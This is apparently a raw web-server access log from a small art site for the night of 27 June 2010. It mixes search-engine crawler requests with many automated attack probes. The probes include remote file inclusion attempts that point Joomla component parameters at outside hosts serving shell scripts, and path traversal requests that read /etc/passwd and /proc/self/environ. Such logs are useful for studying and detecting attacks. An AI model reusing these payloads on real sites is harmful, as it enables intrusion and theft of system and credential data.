207.46.194.51 - - [27/Jun/2010:22:05:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.51 - - [27/Jun/2010:22:05:13 -0500] "GET /artwork/ballerina_sailfish.png HTTP/1.1" 200 54573 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
91.198.130.7 - - [27/Jun/2010:22:05:40 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:05:40 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:05:41 -0500] "GET /logs/access_log.1276732800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
207.46.199.177 - - [27/Jun/2010:22:06:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.198.130.7 - - [27/Jun/2010:22:09:39 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:09:41 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:09:49 -0500] "GET /logs/access_log.1276819200%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:09:50 -0500] "GET /logs/access_log.1276732800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
202.62.103.120 - - [27/Jun/2010:22:13:31 -0500] "GET /logs/access_log.1277164800/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:22:13:34 -0500] "GET /*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:22:13:41 -0500] "GET /logs/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:22:14:04 -0500] "GET /logs/access_log.1274572800/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
91.198.130.7 - - [27/Jun/2010:22:15:07 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:15:07 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:15:07 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:15:58 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:15:58 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:15:58 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:22:21:10 -0500] "GET /logs/access_log.1276041600/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
207.46.194.73 - - [27/Jun/2010:22:27:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.73 - - [27/Jun/2010:22:27:48 -0500] "GET /artwork/fishplatter1.png HTTP/1.1" 200 33135 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.238 - - [27/Jun/2010:22:30:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.238 - - [27/Jun/2010:22:30:38 -0500] "GET /artwork/mayo1.JPG HTTP/1.1" 200 9220 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
79.174.72.200 - - [27/Jun/2010:22:37:40 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
207.46.199.238 - - [27/Jun/2010:22:39:56 -0500] "GET /artwork/clinic7.JPG HTTP/1.1" 200 10565 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
200.43.180.250 - - [27/Jun/2010:22:41:54 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
207.46.199.228 - - [27/Jun/2010:22:42:07 -0500] "GET /artwork/clinic9.JPG HTTP/1.1" 200 14899 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
216.105.40.177 - - [27/Jun/2010:22:43:39 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
207.46.199.215 - - [27/Jun/2010:22:45:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.215 - - [27/Jun/2010:22:45:26 -0500] "GET /artwork/painted-dresser1.png HTTP/1.1" 200 54187 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.215 - - [27/Jun/2010:22:45:26 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 200 1977 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
79.174.72.200 - - [27/Jun/2010:22:47:32 -0500] "GET /logs/access_log.1277164800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:47:32 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:47:32 -0500] "GET /logs///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:48:00 -0500] "GET /logs/access_log.1277164800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:48:00 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:48:01 -0500] "GET /logs///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:50:04 -0500] "GET /logs/access_log.1274572800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:22:50:04 -0500] "GET /logs/access_log.1274572800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
87.250.252.241 - - [27/Jun/2010:22:51:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [27/Jun/2010:22:53:51 -0500] "GET /logs/access_log.1190073600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.61.244.6 - - [27/Jun/2010:22:55:48 -0500] "GET /logs/access_log.1276041600/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.61.244.6 - - [27/Jun/2010:22:55:50 -0500] "GET /?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.61.244.6 - - [27/Jun/2010:22:55:51 -0500] "GET /logs/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""libwww-perl/5.76"
209.61.244.6 - - [27/Jun/2010:22:56:27 -0500] "GET /logs/access_log.1275782400/?option=com_projectfork§ion=tasks&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
200.43.180.250 - - [27/Jun/2010:23:03:54 -0500] "GET /logs/access_log.1277164800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:23:03:57 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:23:04:00 -0500] "GET /logs///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
85.223.63.220 - - [27/Jun/2010:23:06:29 -0500] "GET /logs/access_log.1266710400//init_basic.php?GALLERY_BASEDIR=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
85.223.63.220 - - [27/Jun/2010:23:06:30 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.223.63.220 - - [27/Jun/2010:23:06:30 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.43.180.250 - - [27/Jun/2010:23:06:55 -0500] "GET /logs/access_log.1277164800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:23:06:59 -0500] "GET ///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
200.43.180.250 - - [27/Jun/2010:23:07:02 -0500] "GET /logs///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
91.121.67.226 - - [27/Jun/2010:23:12:20 -0500] "GET /%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:12:23 -0500] "GET /%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:12:56 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:13:01 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:13:15 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
200.43.180.250 - - [27/Jun/2010:23:13:49 -0500] "GET /logs/access_log.1274572800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
81.31.149.80 - - [27/Jun/2010:23:13:59 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:14:09 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.43.180.250 - - [27/Jun/2010:23:14:58 -0500] "GET /logs/access_log.1274572800///index.php?option=com_myblog&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
81.31.149.80 - - [27/Jun/2010:23:15:06 -0500] "GET /logs/access_log.1276041600/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 374 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:15:06 -0500] "GET /%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:15:06 -0500] "GET /logs/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:15:29 -0500] "GET /logs/access_log.1276041600/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 374 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:15:30 -0500] "GET /%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:15:30 -0500] "GET /logs/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:15:31 -0500] "GET /logs/access_log.1274400000/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 374 "-""libwww-perl/5.808"
207.46.194.67 - - [27/Jun/2010:23:16:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.67 - - [27/Jun/2010:23:16:07 -0500] "GET /artwork/msgr.jpg HTTP/1.1" 200 18047 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
91.121.67.226 - - [27/Jun/2010:23:16:14 -0500] "GET /logs/access_log.1274400000/%60../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 374 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:17:05 -0500] "GET /logs/access_log.1275696000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:17:06 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:17:06 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:17:31 -0500] "GET /logs/access_log.1275696000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:17:31 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:17:32 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:18:41 -0500] "GET /logs/access_log.1274400000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:18:41 -0500] "GET /logs/access_log.1274400000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:18:41 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:18:41 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:18:41 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:18:41 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.121.67.226 - - [27/Jun/2010:23:18:49 -0500] "GET /logs/access_log.1276041600//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:23:18:57 -0500] "GET /logs/access_log.1274400000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:18:57 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:18:57 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:23:19:05 -0500] "GET /logs/access_log.1276041600//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
67.228.107.2 - - [27/Jun/2010:23:24:06 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:06 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:06 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:08 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:08 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:08 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:12 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:12 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:12 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:13 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:13 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:13 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:14 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:15 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:15 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:15 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:15 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:15 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:19 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:19 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:20 -0500] "GET /logs/access_log.1277164800//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:20 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:23:24:20 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
77.222.56.62 - - [27/Jun/2010:23:25:27 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.222.56.62 - - [27/Jun/2010:23:25:27 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [27/Jun/2010:23:25:27 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.56.62 - - [27/Jun/2010:23:25:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.62.103.120 - - [27/Jun/2010:23:26:54 -0500] "GET /logs/access_log.1274572800/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:23:27:01 -0500] "GET /*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
202.62.103.120 - - [27/Jun/2010:23:27:08 -0500] "GET /logs/*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
67.195.112.180 - - [27/Jun/2010:23:29:24 -0500] "GET /logs/access_log.1268265600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.67.226 - - [27/Jun/2010:23:38:00 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.46.194.64 - - [27/Jun/2010:23:38:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.64 - - [27/Jun/2010:23:38:58 -0500] "GET /artwork/boxfishstack.png HTTP/1.1" 200 44901 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Jun/2010:23:39:30 -0500] "GET /logs/access_log.1213660800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.72.200 - - [27/Jun/2010:23:40:36 -0500] "GET /index_principal.php?pagina=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:40:36 -0500] "GET /index_principal.php?pagina=http://yeshouse.net/my/.injek/anak.txt?????? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
195.189.90.40 - - [27/Jun/2010:23:42:22 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:42:22 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:42:27 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:42:30 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:42:33 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:42:33 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.121.67.226 - - [27/Jun/2010:23:45:54 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:45:54 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:45:54 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
95.156.233.139 - - [27/Jun/2010:23:47:15 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:15 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
